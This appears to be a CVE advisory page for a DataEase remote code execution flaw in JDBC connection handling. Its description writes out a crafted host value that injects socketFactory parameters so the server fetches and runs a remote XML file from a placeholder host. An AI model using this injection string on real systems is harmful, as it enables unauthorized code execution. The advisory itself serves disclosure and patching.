Security Advisory

CVE-2024-55952

CVE vulnerability detail — eXtreme Datacenter Security Operations

Published 2024-12-18 18:49:24
Last updated 2024-12-18 19:16:19
Assigner GitHub_M
State PUBLISHED

Description

DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.